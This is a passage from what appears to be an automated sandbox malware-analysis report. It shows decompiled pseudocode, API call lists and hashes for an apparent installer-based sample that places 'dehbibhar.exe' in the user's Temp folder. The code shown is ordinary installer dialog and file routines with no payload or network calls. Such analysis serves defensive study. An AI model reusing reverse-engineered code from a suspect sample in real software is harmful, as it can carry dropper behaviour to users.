                          								_t169 = 0x400;
                          								L36:
                          								_t95 = E00404DF1(5);
                          								if(_v12 != _t158) {
                          									_t197 = _v44;
                          									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                          										_v8 = 2;
                          									}
                          								}
                          								if( *((intOrPtr*)( *0x4291fc + 0x10)) != _t158) {
                          									E00404DD9(0x3ff, 0xfffffffb, _t95);
                          									if(_v12 == _t158) {
                          										SetDlgItemTextW(_a4, _t169, 0x4216c8);
                          									} else {
                          										E00404D10(_t169, 0xfffffffc, _v48, _v44);
                          									}
                          								}
                          								_t96 = _v8;
                          								 *0x42a2c4 = _t96;
                          								if(_t96 == _t158) {
                          									_v8 = E0040140B(7);
                          								}
                          								if(( *(_v32 + 0x14) & _t169) != 0) {
                          									_v8 = _t158;
                          								}
                          								E00404485(0 | _v8 == _t158);
                          								if(_v8 == _t158 &&  *0x4236f8 == _t158) {
                          									E004048AD();
                          								}
                          								 *0x4236f8 = _t158;
                          								goto L53;
                          							}
                          						}
                          						_t186 = _a8 - 0x405;
                          						if(_a8 != 0x405) {
                          							goto L53;
                          						}
                          						goto L22;
                          					}
                          					_t118 = _a12 & 0x0000ffff;
                          					if(_t118 != 0x3fb) {
                          						L12:
                          						if(_t118 == 0x3e9) {
                          							_t152 = 7;
                          							memset( &_v76, 0, _t152 << 2);
                          							_v80 = _t167;
                          							_v72 = 0x423708;
                          							_v60 = E00404CAA;
                          							_v56 = _t146;
                          							_v68 = E00406544(_t146, 0x423708, _t167, 0x421ee0, _v12);
                          							_t122 =  &_v80;
                          							_v64 = 0x41;
                          							__imp__SHBrowseForFolderW(_t122);
                          							if(_t122 == 0) {
                          								_a8 = 0x40f;
                          							} else {
                          								__imp__CoTaskMemFree(_t122);
                          								E00405DD6(_t146);
                          								_t125 =  *((intOrPtr*)( *0x42a230 + 0x11c));
                          								if( *((intOrPtr*)( *0x42a230 + 0x11c)) != 0 && _t146 == L"C:\\Users\\jones\\AppData\\Local\\Temp") {
                          									E00406544(_t146, 0x423708, _t167, 0, _t125);
                          									if(lstrcmpiW(0x4281c0, 0x423708) != 0) {
                          										lstrcatW(_t146, 0x4281c0);
                          									}
                          								}
                          								 *0x4236f8 =  *0x4236f8 + 1;
                          								SetDlgItemTextW(_t167, 0x3fb, _t146);
                          							}
                          						}
                          						goto L20;
                          					}
                          					if(_a12 >> 0x10 != 0x300) {
                          						goto L53;
                          					}
                          					_a8 = 0x40f;
                          					goto L12;
                          				} else {
                          					_t166 = GetDlgItem(_t167, 0x3fb);
                          					if(E00405E4D(_t146) != 0 && E00405E81(_t146) == 0) {
                          						E00405DD6(_t146);
                          					}
                          					 *0x4291f8 = _t167;
                          					SetWindowTextW(_t166, _t146);
                          					_push( *((intOrPtr*)(_a16 + 0x34)));
                          					_push(1);
                          					E00404463(_t167);
                          					_push( *((intOrPtr*)(_a16 + 0x30)));
                          					_push(0x14);
                          					E00404463(_t167);
                          					E00404498(_t166);
                          					_t138 = E004068D4(8);
                          					if(_t138 == 0) {
                          						L53:
                          						return E004044CA(_a8, _a12, _a16);
                          					} else {
                          						 *_t138(_t166, 1);
                          						goto L8;
                          					}
                          				}
                          			}













































                          0x00404954
                          0x0040495a
                          0x00404960
                          0x0040496d
                          0x0040497b
                          0x0040497e
                          0x00404986
                          0x0040498c
                          0x0040498c
                          0x00404998
                          0x0040499b
                          0x00404a09
                          0x00404a10
                          0x00404ae7
                          0x00404aee
                          0x00404afd
                          0x00404afd
                          0x00404b01
                          0x00404b0b
                          0x00404b18
                          0x00404b1a
                          0x00404b1a
                          0x00404b28
                          0x00404b2f
                          0x00404b36
                          0x00404b39
                          0x00404b75
                          0x00404b77
                          0x00404b7d
                          0x00404b82
                          0x00404b86
                          0x00404b88
                          0x00404b88
                          0x00404ba4
                          0x00000000
                          0x00404ba6
                          0x00404ba9
                          0x00404bb7
                          0x00404bbd
                          0x00404bbe
                          0x00404bc1
                          0x00404bc4
                          0x00000000
                          0x00404bc4
                          0x00404b3b
                          0x00404b3d
                          0x00404b41
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404b43
                          0x00404b43
                          0x00404b50
                          0x00404b55
                          0x00000000
                          0x00000000
                          0x00404b59
                          0x00404b5b
                          0x00404b5b
                          0x00404b64
                          0x00404b66
                          0x00404b6b
                          0x00404b6e
                          0x00404b73
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404b73
                          0x00404bd0
                          0x00404bda
                          0x00404bdd
                          0x00404be0
                          0x00404be7
                          0x00404be7
                          0x00404be9
                          0x00404be9
                          0x00404bee
                          0x00404bf0
                          0x00404bf8
                          0x00404bff
                          0x00404c01
                          0x00404c0c
                          0x00404c0c
                          0x00404c01
                          0x00404c1c
                          0x00404c26
                          0x00404c2e
                          0x00404c49
                          0x00404c30
                          0x00404c39
                          0x00404c39
                          0x00404c2e
                          0x00404c4e
                          0x00404c53
                          0x00404c58
                          0x00404c61
                          0x00404c61
                          0x00404c6a
                          0x00404c6c
                          0x00404c6c
                          0x00404c78
                          0x00404c80
                          0x00404c8a
                          0x00404c8a
                          0x00404c8f
                          0x00000000
                          0x00404c8f
                          0x00404b39
                          0x00404af0
                          0x00404af7
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404af7
                          0x00404a16
                          0x00404a1f
                          0x00404a39
                          0x00404a3e
                          0x00404a48
                          0x00404a4f
                          0x00404a5b
                          0x00404a5e
                          0x00404a61
                          0x00404a68
                          0x00404a70
                          0x00404a73
                          0x00404a77
                          0x00404a7e
                          0x00404a86
                          0x00404ae0
                          0x00404a88
                          0x00404a89
                          0x00404a90
                          0x00404a9a
                          0x00404aa2
                          0x00404aaf
                          0x00404ac3
                          0x00404ac7
                          0x00404ac7
                          0x00404ac3
                          0x00404acc
                          0x00404ad9
                          0x00404ad9
                          0x00404a86
                          0x00000000
                          0x00404a3e
                          0x00404a2c
                          0x00000000
                          0x00000000
                          0x00404a32
                          0x00000000
                          0x0040499d
                          0x004049aa
                          0x004049b3
                          0x004049c0
                          0x004049c0
                          0x004049c7
                          0x004049cd
                          0x004049d6
                          0x004049d9
                          0x004049dc
                          0x004049e4
                          0x004049e7
                          0x004049ea
                          0x004049f0
                          0x004049f7
                          0x004049fe
                          0x00404c95
                          0x00404ca7
                          0x00404a04
                          0x00404a07
                          0x00000000
                          0x00404a07
                          0x004049fe

                          APIs
                          • GetDlgItem.USER32 ref: 004049A3
                          • SetWindowTextW.USER32(00000000,?), ref: 004049CD
                          • SHBrowseForFolderW.SHELL32(?), ref: 00404A7E
                          • CoTaskMemFree.OLE32(00000000), ref: 00404A89
                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl,00423708,00000000,?,?), ref: 00404ABB
                          • lstrcatW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl), ref: 00404AC7
                          • SetDlgItemTextW.USER32 ref: 00404AD9
                            • Part of subcall function 00405B4B: GetDlgItemTextW.USER32(?,?,00000400,00404B10), ref: 00405B5E
                            • Part of subcall function 0040678E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
                            • Part of subcall function 0040678E: CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
                            • Part of subcall function 0040678E: CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
                            • Part of subcall function 0040678E: CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
                          • GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404B9C
                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BB7
                            • Part of subcall function 00404D10: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                            • Part of subcall function 00404D10: wsprintfW.USER32 ref: 00404DBA
                            • Part of subcall function 00404D10: SetDlgItemTextW.USER32 ref: 00404DCD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                          • String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl
                          • API String ID: 2624150263-1430926482
                          • Opcode ID: 48ad64a3fb01620437031791bd8cc3571db2214d75aa2af41fbbb2d007395b46
                          • Instruction ID: 7ddb5d330cbe89f2e36b0747fff93e5a2dbc4858b94af439da1a7eccca155f6e
                          • Opcode Fuzzy Hash: 48ad64a3fb01620437031791bd8cc3571db2214d75aa2af41fbbb2d007395b46
                          • Instruction Fuzzy Hash: 2EA18FB1900209ABDB119FA6CD45AAFB6B8EF84314F11803BF611B62D1D77C9A418B69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E004021AA() {
                          				signed int _t52;
                          				void* _t56;
                          				intOrPtr* _t60;
                          				intOrPtr _t61;
                          				intOrPtr* _t62;
                          				intOrPtr* _t64;
                          				intOrPtr* _t66;
                          				intOrPtr* _t68;
                          				intOrPtr* _t70;
                          				intOrPtr* _t72;
                          				intOrPtr* _t74;
                          				intOrPtr* _t76;
                          				intOrPtr* _t78;
                          				intOrPtr* _t80;
                          				void* _t83;
                          				intOrPtr* _t91;
                          				signed int _t101;
                          				signed int _t105;
                          				void* _t107;
                          
                          				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                          				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                          				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                          				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                          				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                          				_t52 =  *(_t107 - 0x20);
                          				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                          				_t101 = _t52 & 0x00008000;
                          				_t105 = _t52 >> 0x0000000c & 0x00000007;
                          				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                          				if(E00405E4D( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                          					E00402DA6(0x21);
                          				}
                          				_t56 = _t107 + 8;
                          				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                          				if(_t56 < _t83) {
                          					L14:
                          					 *((intOrPtr*)(_t107 - 4)) = 1;
                          					_push(0xfffffff0);
                          				} else {
                          					_t60 =  *((intOrPtr*)(_t107 + 8));
                          					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                          					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                          					if(_t61 >= _t83) {
                          						_t64 =  *((intOrPtr*)(_t107 + 8));
                          						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                          						if(_t101 == _t83) {
                          							_t80 =  *((intOrPtr*)(_t107 + 8));
                          							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x436000);
                          						}
                          						if(_t105 != _t83) {
                          							_t78 =  *((intOrPtr*)(_t107 + 8));
                          							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                          						}
                          						_t66 =  *((intOrPtr*)(_t107 + 8));
                          						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                          						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                          						if( *_t91 != _t83) {
                          							_t76 =  *((intOrPtr*)(_t107 + 8));
                          							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                          						}
                          						_t68 =  *((intOrPtr*)(_t107 + 8));
                          						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                          						_t70 =  *((intOrPtr*)(_t107 + 8));
                          						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                          						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                          							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                          							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                          						}
                          						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                          						 *((intOrPtr*)( *_t72 + 8))(_t72);
                          					}
                          					_t62 =  *((intOrPtr*)(_t107 + 8));
                          					 *((intOrPtr*)( *_t62 + 8))(_t62);
                          					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                          						_push(0xfffffff4);
                          					} else {
                          						goto L14;
                          					}
                          				}
                          				E00401423();
                          				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t107 - 4));
                          				return 0;
                          			}






















                          0x004021b3
                          0x004021bd
                          0x004021c7
                          0x004021d1
                          0x004021dc
                          0x004021df
                          0x004021f9
                          0x004021fc
                          0x00402202
                          0x00402205
                          0x0040220f
                          0x00402213
                          0x00402213
                          0x00402218
                          0x00402229
                          0x00402231
                          0x004022e8
                          0x004022e8
                          0x004022ef
                          0x00402237
                          0x00402237
                          0x00402246
                          0x0040224a
                          0x0040224d
                          0x00402253
                          0x00402261
                          0x00402264
                          0x00402266
                          0x00402271
                          0x00402271
                          0x00402276
                          0x00402278
                          0x0040227f
                          0x0040227f
                          0x00402282
                          0x0040228b
                          0x0040228e
                          0x00402294
                          0x00402296
                          0x004022a0
                          0x004022a0
                          0x004022a3
                          0x004022ac
                          0x004022af
                          0x004022b8
                          0x004022be
                          0x004022c0
                          0x004022ce
                          0x004022ce
                          0x004022d1
                          0x004022d7
                          0x004022d7
                          0x004022da
                          0x004022e0
                          0x004022e6
                          0x004022fb
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004022e6
                          0x004022f1
                          0x00402c2d
                          0x00402c39

                          APIs
                          • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: CreateInstance
                          • String ID:
                          • API String ID: 542301482-0
                          • Opcode ID: b46a74587854a4a5a635a024edcd41f24a6e269412bb0254ad6851c745bb5835
                          • Instruction ID: 543bd56792285dd9977ebe6a5c934514532920c251de70bc34d4fa366edb348e
                          • Opcode Fuzzy Hash: b46a74587854a4a5a635a024edcd41f24a6e269412bb0254ad6851c745bb5835
                          • Instruction Fuzzy Hash: 80411771A00209EFCF40DFE4C989E9D7BB5BF49308B20456AF505EB2D1DB799941CB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 39%
                          			E0040290B(short __ebx, short* __edi) {
                          				void* _t21;
                          
                          				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                          					E0040644E( *((intOrPtr*)(_t21 - 0xc)), _t8);
                          					_push(_t21 - 0x2b0);
                          					_push(__edi);
                          					E00406507();
                          				} else {
                          					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                          					 *__edi = __ebx;
                          					 *((intOrPtr*)(_t21 - 4)) = 1;
                          				}
                          				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t21 - 4));
                          				return 0;
                          			}




                          0x00402923
                          0x0040293e
                          0x00402949
                          0x0040294a
                          0x00402a94
                          0x00402925
                          0x00402928
                          0x0040292b
                          0x0040292e
                          0x0040292e
                          0x00402c2d
                          0x00402c39

                          APIs
                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: FileFindFirst
                          • String ID:
                          • API String ID: 1974802433-0
                          • Opcode ID: 4712ae4617162a5ad1e1685ee19aa8be35db2a8aaa72db92bc2a724f02566d86
                          • Instruction ID: 26775ad4c1080374fb75430f90045566014d5e2c4dab898babe53efe7e17598a
                          • Opcode Fuzzy Hash: 4712ae4617162a5ad1e1685ee19aa8be35db2a8aaa72db92bc2a724f02566d86
                          • Instruction Fuzzy Hash: F3F08271A04104EFD701DBA4DD49AAEB378FF14314F60417BE101F21D0E7B88E129B2A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E00404ED0(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                          				struct HWND__* _v8;
                          				struct HWND__* _v12;
                          				long _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				intOrPtr _v28;
                          				signed char* _v32;
                          				int _v36;
                          				signed int _v44;
                          				int _v48;
                          				signed int* _v60;
                          				signed char* _v64;
                          				signed int _v68;
                          				long _v72;
                          				void* _v76;
                          				intOrPtr _v80;
                          				intOrPtr _v84;
                          				void* _v88;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				signed int _t198;
                          				intOrPtr _t201;
                          				long _t207;
                          				signed int _t211;
                          				signed int _t222;
                          				void* _t225;
                          				void* _t226;
                          				int _t232;
                          				long _t237;
                          				long _t238;
                          				signed int _t239;
                          				signed int _t245;
                          				signed int _t247;
                          				signed char _t248;
                          				signed char _t254;
                          				void* _t258;
                          				void* _t260;
                          				signed char* _t278;
                          				signed char _t279;
                          				long _t284;
                          				struct HWND__* _t291;
                          				signed int* _t292;
                          				int _t293;
                          				long _t294;
                          				signed int _t295;
                          				void* _t297;
                          				long _t298;
                          				int _t299;
                          				signed int _t300;
                          				signed int _t303;
                          				signed int _t311;
                          				signed char* _t319;
                          				int _t324;
                          				void* _t326;
                          
                          				_t291 = _a4;
                          				_v12 = GetDlgItem(_t291, 0x3f9);
                          				_v8 = GetDlgItem(_t291, 0x408);
                          				_t326 = SendMessageW;
                          				_v24 =  *0x42a248;
                          				_v28 =  *0x42a230 + 0x94;
                          				if(_a8 != 0x110) {
                          					L23:
                          					if(_a8 != 0x405) {
                          						_t301 = _a16;
                          					} else {
                          						_a12 = 0;
                          						_t301 = 1;
                          						_a8 = 0x40f;
                          						_a16 = 1;
                          					}
                          					if(_a8 == 0x4e || _a8 == 0x413) {
                          						_v16 = _t301;
                          						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                          							if(( *0x42a239 & 0x00000002) != 0) {
                          								L41:
                          								if(_v16 != 0) {
                          									_t237 = _v16;
                          									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                          										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                          									}
                          									_t238 = _v16;
                          									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                          										_t301 = _v24;
                          										_t239 =  *(_t238 + 0x5c);
                          										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                          											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                          										} else {
                          											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                          										}
                          									}
                          								}
                          								goto L48;
                          							}
                          							if(_a8 == 0x413) {
                          								L33:
                          								_t301 = 0 | _a8 != 0x00000413;
                          								_t245 = E00404E1E(_v8, _a8 != 0x413);
                          								_t295 = _t245;
                          								if(_t295 >= 0) {
                          									_t94 = _v24 + 8; // 0x8
                          									_t301 = _t245 * 0x818 + _t94;
                          									_t247 =  *_t301;
                          									if((_t247 & 0x00000010) == 0) {
                          										if((_t247 & 0x00000040) == 0) {
                          											_t248 = _t247 ^ 0x00000001;
                          										} else {
                          											_t254 = _t247 ^ 0x00000080;
                          											if(_t254 >= 0) {
                          												_t248 = _t254 & 0x000000fe;
                          											} else {
                          												_t248 = _t254 | 0x00000001;
                          											}
                          										}
                          										 *_t301 = _t248;
                          										E0040117D(_t295);
                          										_a12 = _t295 + 1;
                          										_a16 =  !( *0x42a238) >> 0x00000008 & 0x00000001;
                          										_a8 = 0x40f;
                          									}
                          								}
                          								goto L41;
                          							}
                          							_t301 = _a16;
                          							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                          								goto L41;
                          							}
                          							goto L33;
                          						} else {
                          							goto L48;
                          						}
                          					} else {
                          						L48:
                          						if(_a8 != 0x111) {
                          							L56:
                          							if(_a8 == 0x200) {
                          								SendMessageW(_v8, 0x200, 0, 0);
                          							}
                          							if(_a8 == 0x40b) {
                          								_t225 =  *0x4236ec;
                          								if(_t225 != 0) {
                          									ImageList_Destroy(_t225);
                          								}
                          								_t226 =  *0x423700;
                          								if(_t226 != 0) {
                          									GlobalFree(_t226);
                          								}
                          								 *0x4236ec = 0;
                          								 *0x423700 = 0;
                          								 *0x42a280 = 0;
                          							}
                          							if(_a8 != 0x40f) {
                          								L90:
                          								if(_a8 == 0x420 && ( *0x42a239 & 0x00000001) != 0) {
                          									_t324 = (0 | _a16 == 0x00000020) << 3;
                          									ShowWindow(_v8, _t324);
                          									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                          								}
                          								goto L93;
                          							} else {
                          								E004011EF(_t301, 0, 0);
                          								_t198 = _a12;
                          								if(_t198 != 0) {
                          									if(_t198 != 0xffffffff) {
                          										_t198 = _t198 - 1;
                          									}
                          									_push(_t198);
                          									_push(8);
                          									E00404E9E();
                          								}
                          								if(_a16 == 0) {
                          									L75:
                          									E004011EF(_t301, 0, 0);
                          									_v36 =  *0x423700;
                          									_t201 =  *0x42a248;
                          									_v64 = 0xf030;
                          									_v24 = 0;
                          									if( *0x42a24c <= 0) {
                          										L86:
                          										if( *0x42a2de == 0x400) {
                          											InvalidateRect(_v8, 0, 1);
                          										}
                          										if( *((intOrPtr*)( *0x4291fc + 0x10)) != 0) {
                          											E00404DD9(0x3ff, 0xfffffffb, E00404DF1(5));
                          										}
                          										goto L90;
                          									}
                          									_t292 = _t201 + 8;
                          									do {
                          										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                          										if(_t207 != 0) {
                          											_t303 =  *_t292;
                          											_v72 = _t207;
                          											_v76 = 8;
                          											if((_t303 & 0x00000001) != 0) {
                          												_v76 = 9;
                          												_v60 =  &(_t292[4]);
                          												_t292[0] = _t292[0] & 0x000000fe;
                          											}
                          											if((_t303 & 0x00000040) == 0) {
                          												_t211 = (_t303 & 0x00000001) + 1;
                          												if((_t303 & 0x00000010) != 0) {
                          													_t211 = _t211 + 3;
                          												}
                          											} else {
                          												_t211 = 3;
                          											}
                          											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                          											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                          											SendMessageW(_v8, 0x113f, 0,  &_v76);
                          										}
                          										_v24 = _v24 + 1;
                          										_t292 =  &(_t292[0x206]);
                          									} while (_v24 <  *0x42a24c);
                          									goto L86;
                          								} else {
                          									_t293 = E004012E2( *0x423700);
                          									E00401299(_t293);
                          									_t222 = 0;
                          									_t301 = 0;
                          									if(_t293 <= 0) {
                          										L74:
                          										SendMessageW(_v12, 0x14e, _t301, 0);
                          										_a16 = _t293;
                          										_a8 = 0x420;
                          										goto L75;
                          									} else {
                          										goto L71;
                          									}
                          									do {
                          										L71:
                          										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                          											_t301 = _t301 + 1;
                          										}
                          										_t222 = _t222 + 1;
                          									} while (_t222 < _t293);
                          									goto L74;
                          								}
                          							}
                          						}
                          						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                          							goto L93;
                          						} else {
                          							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                          							if(_t232 == 0xffffffff) {
                          								goto L93;
                          							}
                          							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                          							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                          								_t294 = 0x20;
                          							}
                          							E00401299(_t294);
                          							SendMessageW(_a4, 0x420, 0, _t294);
                          							_a12 = _a12 | 0xffffffff;
                          							_a16 = 0;
                          							_a8 = 0x40f;
                          							goto L56;
                          						}
                          					}
                          				} else {
                          					_v36 = 0;
                          					_v20 = 2;
                          					 *0x42a280 = _t291;
                          					 *0x423700 = GlobalAlloc(0x40,  *0x42a24c << 2);
                          					_t258 = LoadImageW( *0x42a220, 0x6e, 0, 0, 0, 0);
                          					 *0x4236f4 =  *0x4236f4 | 0xffffffff;
                          					_t297 = _t258;
                          					 *0x4236fc = SetWindowLongW(_v8, 0xfffffffc, E004054DD);
                          					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                          					 *0x4236ec = _t260;
                          					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                          					SendMessageW(_v8, 0x1109, 2,  *0x4236ec);
                          					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                          						SendMessageW(_v8, 0x111b, 0x10, 0);
                          					}
                          					DeleteObject(_t297);
                          					_t298 = 0;
                          					do {
                          						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                          						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                          							if(_t298 != 0x20) {
                          								_v20 = 0;
                          							}
